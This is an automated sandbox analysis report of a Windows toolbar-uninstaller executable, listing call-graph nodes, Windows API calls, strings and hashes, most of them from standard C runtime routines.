3505->3506 3507 fa3665 GetLastError 3506->3507 3507->3501 3508 fa362b 3519 fa3644 3508->3519 3509->3508 3513 fa4614 3509->3513 3512->3501 3512->3503 3514 fa4653 3513->3514 3518 fa48f5 ___sbh_free_block 3513->3518 3515 fa483f VirtualFree 3514->3515 3514->3518 3516 fa48a3 3515->3516 3517 fa48b2 VirtualFree HeapFree 3516->3517 3516->3518 3517->3518 3518->3508 3522 fa29c6 LeaveCriticalSection 3519->3522 3521 fa364b 3521->3512 3522->3521 3524 fa29e9 _doexit 3523->3524 3525 fa2a0f 3524->3525 3549 fa18c4 3524->3549 3533 fa2a1f _doexit 3525->3533 3595 fa36eb 3525->3595 3531 fa2a40 3536 fa2aa0 __lock 66 API calls 3531->3536 3532 fa2a31 3535 fa2c72 _strcat_s 66 API calls 3532->3535 3533->3466 3535->3533 3538 fa2a47 3536->3538 3539 fa2a7b 3538->3539 3540 fa2a4f 3538->3540 3541 fa35ee ___free_lc_time 66 API calls 3539->3541 3542 fa317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3540->3542 3543 fa2a6c 3541->3543 3544 fa2a5a 3542->3544 3600 fa2a97 3543->3600 3544->3543 3545 fa35ee ___free_lc_time 66 API calls 3544->3545 3547 fa2a66 3545->3547 3548 fa2c72 _strcat_s 66 API calls 3547->3548 3548->3543 3603 fa35a3 3549->3603 3552 fa35a3 __set_error_mode 66 API calls 3554 fa18d8 3552->3554 3553 fa1719 __NMSG_WRITE 66 API calls 3555 fa18f0 3553->3555 3554->3553 3556 fa18fa 3554->3556 3557 fa1719 __NMSG_WRITE 66 API calls 3555->3557 3558 fa1719 3556->3558 3557->3556 3559 fa172d 3558->3559 3560 fa35a3 __set_error_mode 63 API calls 3559->3560 3591 fa1888 3559->3591 3561 fa174f 3560->3561 3562 fa188d GetStdHandle 3561->3562 3563 fa35a3 __set_error_mode 63 API calls 3561->3563 3564 fa189b _strlen 3562->3564 3562->3591 3565 fa1760 3563->3565 3567 fa18b4 WriteFile 3564->3567 3564->3591 3565->3562 3566 fa1772 3565->3566 3566->3591 3609 fa353b 3566->3609 3567->3591 3570 fa17a8 GetModuleFileNameA 3572 fa17c6 3570->3572 3576 fa17e9 _strlen 3570->3576 3574 fa353b _strcpy_s 63 API calls 3572->3574 3575 fa17d6 3574->3575 3575->3576 3578 fa2ae2 __invoke_watson 10 API calls 3575->3578 3577 fa182c 3576->3577 3625 fa33f0 3576->3625 3634 fa337c 3577->3634 3578->3576 3582 fa1850 3585 fa337c _strcat_s 63 API calls 3582->3585 3584 fa2ae2 __invoke_watson 10 API calls 3584->3582 3586 fa1864 3585->3586 3588 fa1875 3586->3588 3589 fa2ae2 __invoke_watson 10 API calls 3586->3589 3587 fa2ae2 __invoke_watson 10 API calls 3587->3577 3643 fa3213 3588->3643 3589->3588 3592 fa1465 3591->3592 3681 fa143a GetModuleHandleW 3592->3681 3599 fa36f4 3595->3599 3597 fa2a2a 3597->3531 3597->3532 3598 fa370b Sleep 3598->3599 3599->3597 3599->3598 3685 fa54b5 3599->3685 3714 fa29c6 LeaveCriticalSection 3600->3714 3602 fa2a9e 3602->3533 3604 fa35b2 3603->3604 3605 fa18cb 3604->3605 3606 fa2c72 _strcat_s 66 API calls 3604->3606 3605->3552 3605->3554 3607 fa35d5 3606->3607 3608 fa2c0a _strcat_s 6 API calls 3607->3608 3608->3605 3610 fa354c 3609->3610 3611 fa3553 3609->3611 3610->3611 3616 fa3579 3610->3616 3612 fa2c72 _strcat_s 66 API calls 3611->3612 3613 fa3558 3612->3613 3614 fa2c0a _strcat_s 6 API calls 3613->3614 3615 fa1794 3614->3615 3615->3570 3618 fa2ae2 3615->3618 3616->3615 3617 fa2c72 _strcat_s 66 API calls 3616->3617 3617->3613 3670 fa5320 3618->3670 3620 fa2b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3621 fa2beb GetCurrentProcess TerminateProcess 3620->3621 3622 fa2bdf __invoke_watson 3620->3622 3672 fa10cc 3621->3672 3622->3621 3624 fa17a5 3624->3570 3629 fa3402 3625->3629 3626 fa3406 3627 fa2c72 _strcat_s 66 API calls 3626->3627 3628 fa1819 3626->3628 3633 fa3422 3627->3633 3628->3577 3628->3587 3629->3626 3629->3628 3631 fa344c 3629->3631 3630 fa2c0a _strcat_s 6 API calls 3630->3628 3631->3628 3632 fa2c72 _strcat_s 66 API calls 3631->3632 3632->3633 3633->3630 3635 fa3394 3634->3635 3637 fa338d 3634->3637 3636 fa2c72 _strcat_s 66 API calls 3635->3636 3642 fa3399 3636->3642 3637->3635 3639 fa33c8 3637->3639 3638 fa2c0a _strcat_s 6 API calls 3640 fa183f 3638->3640 3639->3640 3641 fa2c72 _strcat_s 66 API calls 3639->3641 3640->3582 3640->3584 3641->3642 3642->3638 3644 fa20f0 ___crtMessageBoxW 6 API calls 3643->3644 3645 fa3223 3644->3645 3646 fa3236 LoadLibraryA 3645->3646 3650 fa32be 3645->3650 3647 fa324b GetProcAddress 3646->3647 3648 fa3360 3646->3648 3647->3648 3649 fa3261 3647->3649 3648->3591 3652 fa207e __encode_pointer 6 API calls 3649->3652 3651 fa20f9 __decode_pointer 6 API calls 3650->3651 3669 fa32e8 3650->3669 3655 fa32db 3651->3655 3656 fa3267 GetProcAddress 3652->3656 3653 fa20f9 __decode_pointer 6 API calls 3653->3648 3654 fa20f9 __decode_pointer 6 API calls 3661 fa332b 3654->3661 3657 fa20f9 __decode_pointer 6 API calls 3655->3657 3658 fa207e __encode_pointer 6 API calls 3656->3658 3657->3669 3659 fa327c GetProcAddress 3658->3659 3660 fa207e __encode_pointer 6 API calls 3659->3660 3662 fa3291 GetProcAddress 3660->3662 3664 fa20f9 __decode_pointer 6 API calls 3661->3664 3666 fa3313 3661->3666 3663 fa207e __encode_pointer 6 API calls 3662->3663 3665 fa32a6 3663->3665 3664->3666 3665->3650 3667 fa32b0 GetProcAddress 3665->3667 3666->3653 3668 fa207e __encode_pointer 6 API calls 3667->3668 3668->3650 3669->3654 3669->3666 3671 fa532c __VEC_memzero 3670->3671 3671->3620 3673 fa10d6 IsDebuggerPresent 3672->3673 3674 fa10d4 3672->3674 3680 fa28d2 3673->3680 3674->3624 3677 fa1358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3678 fa137d GetCurrentProcess TerminateProcess 3677->3678 3679 fa1375 __invoke_watson 3677->3679 3678->3624 3679->3678 3680->3677 3682 fa144e GetProcAddress 3681->3682 3683 fa1463 ExitProcess 3681->3683 3682->3683 3684 fa145e 3682->3684 3684->3683 3686 fa5568 3685->3686 3695 fa54c7 3685->3695 3687 fa31eb _realloc 6 API calls 3686->3687 3688 fa556e 3687->3688 3690 fa2c72 _strcat_s 65 API calls 3688->3690 3689 fa18c4 __FF_MSGBANNER 65 API calls 3689->3695 3701 fa5560 3690->3701 3692 fa1719 __NMSG_WRITE 65 API calls 3692->3695 3693 fa5524 HeapAlloc 3693->3695 3694 fa1465 _doexit 3 API calls 3694->3695 3695->3689 3695->3692 3695->3693 3695->3694 3696 fa5554 3695->3696 3698 fa31eb _realloc 6 API calls 3695->3698 3699 fa5559 3695->3699 3695->3701 3702 fa5466 3695->3702 3697 fa2c72 _strcat_s 65 API calls 3696->3697 3697->3699 3698->3695 3700 fa2c72 _strcat_s 65 API calls 3699->3700 3700->3701 3701->3599 3703 fa5472 _doexit 3702->3703 3704 fa54a3 _doexit 3703->3704 3705 fa2aa0 __lock 66 API calls 3703->3705 3704->3695 3706 fa5488 3705->3706 3707 fa4dc3 ___sbh_alloc_block 5 API calls 3706->3707 3708 fa5493 3707->3708 3710 fa54ac 3708->3710 3713 fa29c6 LeaveCriticalSection 3710->3713 3712 fa54b3 3712->3704 3713->3712 3714->3602 3716 fa493d HeapReAlloc 3715->3716 3717 fa4971 HeapAlloc 3715->3717 3718 fa495b 3716->3718 3720 fa495f 3716->3720 3717->3718 3719 fa4994 VirtualAlloc 3717->3719 3718->3471 3719->3718 3721 fa49ae HeapFree 3719->3721 3720->3717 3721->3718 3723 fa49f1 VirtualAlloc 3722->3723 3725 fa4a38 3723->3725 3725->3474 3726->3477 3727->3405 3746 fa29c6 LeaveCriticalSection 3728->3746 3730 fa227c 3730->3415 3732 fa3cbf 3731->3732 3733 fa3cbc InterlockedIncrement 3731->3733 3734 fa3cc9 InterlockedIncrement 3732->3734 3735 fa3ccc 3732->3735 3733->3732 3734->3735 3736 fa3cd9 3735->3736 3737 fa3cd6 InterlockedIncrement 3735->3737 3738 fa3ce3 InterlockedIncrement 3736->3738 3740 fa3ce6 3736->3740 3737->3736 3738->3740 3739 fa3cff InterlockedIncrement 3739->3740 3740->3739 3741 fa3d0f InterlockedIncrement 3740->3741 3742 fa3d1a InterlockedIncrement 3740->3742 3741->3740 3742->3418 3747 fa29c6 LeaveCriticalSection 3743->3747 3745 fa22ca 3745->3420 3746->3730 3747->3745 3748->3280 3750 fa3808 3749->3750 3751 fa382f __VEC_memcpy 3750->3751 3752 fa1dd3 3750->3752 3751->3752 3752->3299 3754 fa368d 3753->3754 3755 fa3694 3753->3755 3754->3755 3757 fa36c0 3754->3757 3756 fa2c72 _strcat_s 66 API calls 3755->3756 3761 fa3699 3756->3761 3759 fa36a8 3757->3759 3760 fa2c72 _strcat_s 66 API calls 3757->3760 3758 fa2c0a _strcat_s 6 API calls 3758->3759 3759->3316 3760->3761 3761->3758 3763 fa2dc9 3762->3763 3764 fa207e __encode_pointer 6 API calls 3763->3764 3765 fa2de1 3763->3765 3764->3763 3765->3324 3769 fa2d70 3766->3769 3768 fa2db9 3768->3326 3770 fa2d7c _doexit 3769->3770 3777 fa147d 3770->3777 3776 fa2d9d _doexit 3776->3768 3778 fa2aa0 __lock 66 API calls 3777->3778 3779 fa1484 3778->3779 3780 fa2c85 3779->3780 3781 fa20f9 __decode_pointer 6 API calls 3780->3781 3782 fa2c99 3781->3782 3783 fa20f9 __decode_pointer 6 API calls 3782->3783 3784 fa2ca9 3783->3784 3785 fa2d2c 3784->3785 3800 fa539a 3784->3800 3797 fa2da6 3785->3797 3787 fa207e __encode_pointer 6 API calls 3788 fa2d21 3787->3788 3791 fa207e __encode_pointer 6 API calls 3788->3791 3789 fa2cc7 3790 fa2ceb 3789->3790 3796 fa2d13 3789->3796 3813 fa377c 3789->3813 3790->3785 3793 fa377c __realloc_crt 73 API calls 3790->3793 3794 fa2d01 3790->3794 3791->3785 3793->3794 3794->3785 3795 fa207e __encode_pointer 6 API calls 3794->3795 3795->3796 3796->3787 3863 fa1486 3797->3863 3801 fa53a6 _doexit 3800->3801 3802 fa53d3 3801->3802 3803 fa53b6 3801->3803 3805 fa5414 HeapSize 3802->3805 3807 fa2aa0 __lock 66 API calls 3802->3807 3804 fa2c72 _strcat_s 66 API calls 3803->3804 3806 fa53bb 3804->3806 3809 fa53cb _doexit 3805->3809 3808 fa2c0a _strcat_s 6 API calls 3806->3808 3810 fa53e3 ___sbh_find_block 3807->3810 3808->3809 3809->3789 3818 fa5434 3810->3818 3815 fa3785 3813->3815 3816 fa37c4 3815->3816 3817 fa37a5 Sleep 3815->3817 3822 fa569d 3815->3822 3816->3790 3817->3815 3821 fa29c6 LeaveCriticalSection 3818->3821 3820 fa540f 3820->3805 3820->3809 3821->3820 3823 fa56a9 _doexit 3822->3823 3824 fa56be 3823->3824 3825 fa56b0 3823->3825 3827 fa56d1 3824->3827 3828 fa56c5 3824->3828 3826 fa54b5 _malloc 66 API calls 3825->3826 3857 fa56b8 _doexit _realloc 3826->3857 3832 fa5843 3827->3832 3856 fa56de ___sbh_resize_block ___sbh_find_block 3827->3856 3829 fa35ee ___free_lc_time 66 API calls 3828->3829 3829->3857 3830 fa5876 3834 fa31eb _realloc 6 API calls 3830->3834 3831 fa5848 HeapReAlloc 3831->3832 3831->3857 3832->3830 3832->3831 3836 fa589a 3832->3836 3838 fa31eb _realloc 6 API calls 3832->3838 3841 fa5890 3832->3841 3833 fa2aa0 __lock 66 API calls 3833->3856 3835 fa587c 3834->3835 3837 fa2c72 _strcat_s 66 API calls 3835->3837 3839 fa2c72 _strcat_s 66 API calls 3836->3839 3836->3857 3837->3857 3838->3832 3840 fa58a3 GetLastError 3839->3840 3840->3857 3843 fa2c72 _strcat_s 66 API calls 3841->3843 3845 fa5811 3843->3845 3844 fa5769 HeapAlloc 3844->3856 3846 fa5816 GetLastError 3845->3846 3845->3857 3846->3857 3847 fa57be HeapReAlloc 3847->3856 3848 fa4dc3 ___sbh_alloc_block 5 API calls 3848->3856 3849 fa5829 3851 fa2c72 _strcat_s 66 API calls 3849->3851 3849->3857 3850 fa31eb _realloc 6 API calls 3850->3856 3854 fa5836 3851->3854 3852 fa580c 3855 fa2c72 _strcat_s 66 API calls 3852->3855 3853 fa37f0 __VEC_memcpy _realloc 3853->3856 3854->3840 3854->3857 3855->3845 3856->3830 3856->3833 3856->3844 3856->3847 3856->3848 3856->3849 3856->3850 3856->3852 3856->3853 3856->3857 3858 fa4614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3856->3858 3859 fa57e1 3856->3859 3857->3815 3858->3856 3862 fa29c6 LeaveCriticalSection 3859->3862 3861 fa57e8 3861->3856 3862->3861 3866 fa29c6 LeaveCriticalSection 3863->3866 3865 fa148d 3865->3776 3866->3865 3868 fa1561 _doexit 3867->3868 3869 fa2aa0 __lock 66 API calls 3868->3869 3870 fa1568 3869->3870 3871 fa1631 __initterm 3870->3871 3872 fa1594 3870->3872 3886 fa166c 3871->3886 3874 fa20f9 __decode_pointer 6 API calls 3872->3874 3876 fa159f 3874->3876 3878 fa1621 __initterm 3876->3878 3880 fa20f9 __decode_pointer 6 API calls 3876->3880 3877 fa1669 _doexit 3877->3343 3878->3871 3885 fa15b4 3880->3885 3881 fa1660 3882 fa1465 _doexit 3 API calls 3881->3882 3882->3877 3883 fa20f0 6 API calls ___crtMessageBoxW 3883->3885 3884 fa20f9 6 API calls __decode_pointer 3884->3885 3885->3878 3885->3883 3885->3884 3887 fa164d 3886->3887 3888 fa1672 3886->3888 3887->3877 3890 fa29c6 LeaveCriticalSection 3887->3890 3891 fa29c6 LeaveCriticalSection 3888->3891 3890->3881 3891->3887

                                                    Control-flow Graph

                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00FA1006
                                                    • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00FA1013
                                                    • GetLastError.KERNEL32 ref: 00FA101F
                                                    • GetCommandLineW.KERNEL32(?), ref: 00FA1040
                                                    • CommandLineToArgvW.SHELL32(00000000), ref: 00FA1047
                                                    • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00FA1061
                                                    • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00FA1073
                                                    • LoadLibraryW.KERNELBASE(?), ref: 00FA1085
                                                    • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00FA1097
                                                    • FreeLibrary.KERNELBASE(00000000), ref: 00FA10A4
                                                    • CloseHandle.KERNELBASE(00000000), ref: 00FA10AB
                                                    • CoUninitialize.COMBASE ref: 00FA10B1
                                                    • LocalFree.KERNEL32(00000000), ref: 00FA10BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true
                                                    • Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd
                                                    Similarity
                                                    • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                    • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                    • API String ID: 474438367-4110843154
                                                    • Opcode ID: b35e82534b406fd128df3706b75dccd0237bfccc283caba46e0b0df1c6d9deff
                                                    • Instruction ID: 08f3607be1ac1f2cd1ab76ea9ea9938349e1defd4c5fa63ebb45d67c9c0ad244
                                                    • Opcode Fuzzy Hash: b35e82534b406fd128df3706b75dccd0237bfccc283caba46e0b0df1c6d9deff
                                                    • Instruction Fuzzy Hash: A31187F29093599B87205B609C08A9F3BACBF477A1B068525F542D2050DFE1D946F7B2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 16 fa1465-fa1476 call fa143a ExitProcess
                                                    APIs
                                                    • ___crtCorExitProcess.LIBCMT ref: 00FA146D
                                                      • Part of subcall function 00FA143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00FA1472,?,?,00FA54EE,000000FF,0000001E,?,00FA36FC,?,00000001,?,?,00FA2A2A,00000018), ref: 00FA1444
                                                      • Part of subcall function 00FA143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FA1454
                                                    • ExitProcess.KERNEL32 ref: 00FA1476
                                                    Memory Dump Source
                                                    • Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true
                                                    • Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                    • String ID:
                                                    • API String ID: 2427264223-0
                                                    • Opcode ID: 0f2504f2159341e93f4724085350758b8af7fd5f2dd1a4c14f997cc3c370ae33
                                                    • Instruction ID: b516ba69f19fe0a8ea188ed66cff1c2589b655e72005d4dd401772ff867935d0
                                                    • Opcode Fuzzy Hash: 0f2504f2159341e93f4724085350758b8af7fd5f2dd1a4c14f997cc3c370ae33
                                                    • Instruction Fuzzy Hash: CBB0927100020CBBDB062F16DC0A84D3F2AFB823A0B65C020F80849031DFB2AD92AA90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 19 fa261b-fa263d HeapCreate 20 fa263f-fa2640 19->20 21 fa2641-fa264a 19->21
                                                    APIs
                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00FA2630
                                                    Memory Dump Source
                                                    • Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true
                                                    • Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd
                                                    Similarity
                                                    • API ID: CreateHeap
                                                    • String ID:
                                                    • API String ID: 10892065-0
                                                    • Opcode ID: 6e4150f24c5814ec6ea9325aa44ae34f11b9f13757e025bc5ebd7244cd9fb7f8
                                                    • Instruction ID: 895daa557faceaf373e6b70234cb3dd3f9530fd4cecf85fe4f49412ba4d9e80d
                                                    • Opcode Fuzzy Hash: 6e4150f24c5814ec6ea9325aa44ae34f11b9f13757e025bc5ebd7244cd9fb7f8
                                                    • Instruction Fuzzy Hash: 0BD0A7B6A9434C5EDB009F75BC087223BDCD3853A5F108435BD0DC6251F6B0C591EA00

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 22 fa1681-fa168d call fa1555 24 fa1692-fa1696 22->24
                                                    APIs
                                                    • _doexit.LIBCMT ref: 00FA168D
                                                      • Part of subcall function 00FA1555: __lock.LIBCMT ref: 00FA1563
                                                      • Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA159A
                                                      • Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA15AF
                                                      • Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA15D9
                                                      • Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA15EF
                                                      • Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA15FC
                                                      • Part of subcall function 00FA1555: __initterm.LIBCMT ref: 00FA162B
                                                      • Part of subcall function 00FA1555: __initterm.LIBCMT ref: 00FA163B
                                                    Memory Dump Source
                                                    • Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true
                                                    • Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd
                                                    Similarity
                                                    • API ID: __decode_pointer$__initterm$__lock_doexit
                                                    • String ID:
                                                    • API String ID: 1597249276-0
                                                    • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                    • Instruction ID: 0628bc902d57011cea9b1553c1d55f34c6766bb761e981457de608fff7858e64
                                                    • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                    • Instruction Fuzzy Hash: C5B0127298030C37DB202586EC03F063F0D97C1BB0F2A0020FA0C1D1F1AAA3B96190CA

                                                    Control-flow Graph

                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00FA1346
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FA135B
                                                    • UnhandledExceptionFilter.KERNEL32(00FA816C), ref: 00FA1366
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00FA1382
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00FA1389
                                                    Memory Dump Source
                                                    • Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true
                                                    • Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: 80cb6fed9a5765316198c520861ae87f97cda69822b37eb2de7ae9cf19d2e755
                                                    • Instruction ID: 24c73af8898208c1004f5728d38abca7fc10736587f9323a64a5b23deb5c1e8a
                                                    • Opcode Fuzzy Hash: 80cb6fed9a5765316198c520861ae87f97cda69822b37eb2de7ae9cf19d2e755
                                                    • Instruction Fuzzy Hash: 3A21DFF491020CDFD791DF28FD446543BB4BB0A352F00901AE58897A60EBB8998DEF46

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00FA9458,0000000C,00FA2320,00000000,00000000,?,00FA174F,00000003,?,?,?,?,?,?,00FA10F6), ref: 00FA21F7
                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 00FA2202
                                                      • Part of subcall function 00FA13E1: Sleep.KERNEL32(000003E8,00000000,?,00FA2148,KERNEL32.DLL,?,00FA2194,?,00FA174F,00000003), ref: 00FA13ED
                                                      • Part of subcall function 00FA13E1: GetModuleHandleW.KERNEL32(?,?,00FA2148,KERNEL32.DLL,?,00FA2194,?,00FA174F,00000003,?,?,?,?,?,?,00FA10F6), ref: 00FA13F6
                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00FA222B
                                                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00FA223B
                                                    • __lock.LIBCMT ref: 00FA225D
                                                    • InterlockedIncrement.KERNEL32(00FAA4D8), ref: 00FA226A
                                                    • __lock.LIBCMT ref: 00FA227E
                                                    • ___addlocaleref.LIBCMT ref: 00FA229C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true
                                                    • Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                    • API String ID: 1028249917-2843748187
                                                    • Opcode ID: fb925a2e32ce6ea2d8a77a5e6ed770323c79d4fc201df777c6a526097d30b5da
                                                    • Instruction ID: 0f95001a6c215fd37847fd4a1062fc35c535a703a28baee1f539ed23d713ff16
                                                    • Opcode Fuzzy Hash: fb925a2e32ce6ea2d8a77a5e6ed770323c79d4fc201df777c6a526097d30b5da
                                                    • Instruction Fuzzy Hash: 7811E4F0A407009FE760EF79DC05B5ABBE0AF16320F104519E499937A1CBB89946FF21

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 170 fa40a0-fa40bb call fa264c call fa2345 175 fa40da-fa40f2 call fa2aa0 170->175 176 fa40bd-fa40c1 170->176 181 fa412a-fa4136 call fa413b 175->181 182 fa40f4-fa40f6 175->182 176->175 178 fa40c3 176->178 180 fa40c6-fa40c8 178->180 183 fa40ca-fa40d1 call fa1411 180->183 184 fa40d2-fa40d9 call fa2691 180->184 181->180 185 fa40f8-fa4101 InterlockedDecrement 182->185 186 fa4112-fa4124 InterlockedIncrement 182->186 183->184 185->186 190 fa4103-fa4109 185->190 186->181 190->186 194 fa410b-fa4111 call fa35ee 190->194 194->186
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00FA40AC
                                                      • Part of subcall function 00FA2345: __getptd_noexit.LIBCMT ref: 00FA2348
                                                      • Part of subcall function 00FA2345: __amsg_exit.LIBCMT ref: 00FA2355
                                                    • __amsg_exit.LIBCMT ref: 00FA40CC
                                                    • __lock.LIBCMT ref: 00FA40DC
                                                    • InterlockedDecrement.KERNEL32(?), ref: 00FA40F9
                                                    • InterlockedIncrement.KERNEL32(02D72B90), ref: 00FA4124
                                                    Memory Dump Source
                                                    • Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true
                                                    • Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                    • String ID:
                                                    • API String ID: 4271482742-0
                                                    • Opcode ID: 19be1b95ad761e350d86f06ce2bf6dd55207c9effcba287a7df2e3f193b0c6b0
                                                    • Instruction ID: 626cb9428b63c78d17ae35704887b23c54254966c9f7504fe62ebc759b57d8c4
                                                    • Opcode Fuzzy Hash: 19be1b95ad761e350d86f06ce2bf6dd55207c9effcba287a7df2e3f193b0c6b0
                                                    • Instruction Fuzzy Hash: D801C0F2E016159BCB62AF29880635D7360BF47760F158009F900A7691CBB8BD96FFD2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
